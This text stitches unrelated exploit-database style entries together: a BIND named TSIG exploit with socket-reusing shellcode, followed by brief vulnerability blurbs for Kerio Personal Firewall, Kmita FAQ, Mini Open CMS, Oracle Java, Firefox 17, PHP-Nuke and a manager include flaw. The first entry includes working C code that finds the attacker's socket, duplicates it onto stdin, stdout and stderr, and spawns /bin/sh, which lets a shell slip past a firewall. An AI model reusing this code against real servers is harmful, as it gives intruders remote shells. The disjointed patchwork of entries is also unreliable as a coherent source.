The code establishes a TCP connection to port 53 of the target system. It makes use of the "infoleak" bug (over UDP) to obtain the base value of the named process's stack frame pointer, which is later used to construct a correct DNS TSIG exploit packet. Upon successful exploitation, the assembly routine is executed. It walks the descriptor table of the exploited named process, searching for the socket descriptor of the previously established TCP connection. The found descriptor is duplicated onto stdin, stdout and stderr, and /bin/sh is spawned. The use of such an assembly routine allows successful exploitation even when the vulnerable DNS server is protected by a tightly configured firewall (with only port 53 tcp/udp open).
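The descriptor-walking step described above, written out as an added C example (this is not the original exploit's assembly routine, which performs the same sequence with raw system calls): the target-side code iterates over descriptors, calls getpeername on each one, and keeps the socket whose peer port equals the attacker's own source port, then dup2's it onto fds 0, 1 and 2 before executing /bin/sh. The rehearsal function stands up a loopback listener on an ephemeral port in place of tcp/53 and plays both sides in one process; the function names and the 1024-descriptor scan limit are assumptions for illustration, and execve is only reached through spawn_shell_on, which the rehearsal deliberately does not call.

```c
/* Added example (Linux/POSIX sockets): how socket-reusing shellcode locates
 * the attacker's TCP connection inside the exploited process. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Walk descriptors 0 .. max_fd-1 and return the first one whose connected
 * peer uses TCP port `peer_port` (host byte order), or -1 if none matches.
 * The attacker knows its own source port, so nothing else is needed. */
int find_socket_fd(int max_fd, uint16_t peer_port) {
    for (int fd = 0; fd < max_fd; fd++) {
        struct sockaddr_in peer;
        socklen_t len = sizeof peer;
        memset(&peer, 0, sizeof peer);
        /* Fails with EBADF/ENOTSOCK/ENOTCONN on anything that is not a
         * connected socket; those descriptors are simply skipped. */
        if (getpeername(fd, (struct sockaddr *)&peer, &len) != 0)
            continue;
        if (peer.sin_family == AF_INET && ntohs(peer.sin_port) == peer_port)
            return fd;
    }
    return -1;
}

/* Duplicate the found socket onto stdin/stdout/stderr. Returns 0 on success. */
int bind_stdio_to(int fd) {
    for (int i = 0; i < 3; i++)
        if (dup2(fd, i) < 0)
            return -1;
    return 0;
}

/* Final step of the shellcode: the shell inherits the socket as its stdio.
 * Never returns on success; not called by the rehearsal below. */
void spawn_shell_on(int fd) {
    if (bind_stdio_to(fd) == 0) {
        char *argv[] = { "/bin/sh", NULL };
        execve("/bin/sh", argv, NULL);
    }
    _exit(1);
}

/* Loopback rehearsal (constructed input): a listener plays the exploited
 * server, a client plays the attacker. Returns 1 if the walk found the
 * accepted connection and a write to fd 1 then arrives at the client. */
int rehearse_socket_reuse(void) {
    int listener = socket(AF_INET, SOCK_STREAM, 0);
    int client = socket(AF_INET, SOCK_STREAM, 0);
    if (listener < 0 || client < 0) return 0;

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;                     /* ephemeral port stands in for 53 */
    socklen_t len = sizeof addr;
    if (bind(listener, (struct sockaddr *)&addr, len) != 0 || listen(listener, 1) != 0 ||
        getsockname(listener, (struct sockaddr *)&addr, &len) != 0 ||
        connect(client, (struct sockaddr *)&addr, len) != 0)
        return 0;
    int accepted = accept(listener, NULL, NULL);
    if (accepted < 0) return 0;

    /* The attacker side records its own source port before sending the exploit. */
    struct sockaddr_in local;
    len = sizeof local;
    if (getsockname(client, (struct sockaddr *)&local, &len) != 0) return 0;
    uint16_t attacker_port = ntohs(local.sin_port);

    int ok = (find_socket_fd(1024, attacker_port) == accepted);

    /* Redirect stdio onto the socket and prove it by reading on the client. */
    int saved[3] = { dup(0), dup(1), dup(2) };
    if (ok && bind_stdio_to(accepted) == 0) {
        const char probe[] = "shell output goes here\n";
        ssize_t w = write(1, probe, sizeof probe - 1);
        char buf[64] = {0};
        ssize_t n = read(client, buf, sizeof buf - 1);
        ok = (w == n) && (n == (ssize_t)(sizeof probe - 1)) && memcmp(buf, probe, n) == 0;
    } else {
        ok = 0;
    }
    for (int i = 0; i < 3; i++) { dup2(saved[i], i); close(saved[i]); }
    close(accepted); close(client); close(listener);
    return ok;
}

int main(void) {
    printf("socket reuse rehearsal: %s\n", rehearse_socket_reuse() ? "ok" : "failed");
    return 0;
}
```

The point of matching on the peer port rather than on a descriptor number is that the exploit cannot predict which fd named assigned to the accepted connection, but it does know the source port it connected from; the firewall never sees a second connection because the shell rides on the one already allowed through to port 53.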
This exploit allows an attacker to execute arbitrary code remotely on a target system running Kerio Personal Firewall v2.1.4 by taking advantage of a vulnerability in the firewall software. The exploit has been tested on Windows XP with SP1.
Attackers can trigger an infinite-loop condition when the library tries to handle malformed image files. This allows them to consume excessive CPU resources on computers that use the affected software, denying service to legitimate users.
Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
The Mini Open CMS v.1.0.0 script is vulnerable to local file inclusion. This can be exploited by an attacker to include arbitrary files from the target system.
The ByteComponentRaster.verify() method in Oracle Java versions prior to 7u25 contains a memory corruption vulnerability that allows the "dataOffsets[]" boundary checks to be bypassed. This vulnerability allows remote code execution. User interaction is required for this exploit: the target must visit a malicious page or open a malicious file.
This module exploits a vulnerability in Firefox 17.0 (versions prior to 17.0.2), specifically a use-after-free of an Element object when using the serializeToStream method with a specially crafted OutputStream that defines its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.
The PHP-Nuke application fails to properly sanitize user-supplied input, resulting in multiple remote file-include vulnerabilities. An attacker can exploit these vulnerabilities to include arbitrary remote files containing malicious PHP code and execute it in the context of the web server process. This can lead to the compromise of the application and the underlying system.
Input passed to the 'f' parameter in "/manager/index.php" isn't properly verified before being used in an include function. This can be exploited to include local files on the target host or to execute commands. Admin credentials are required to exploit this vulnerability.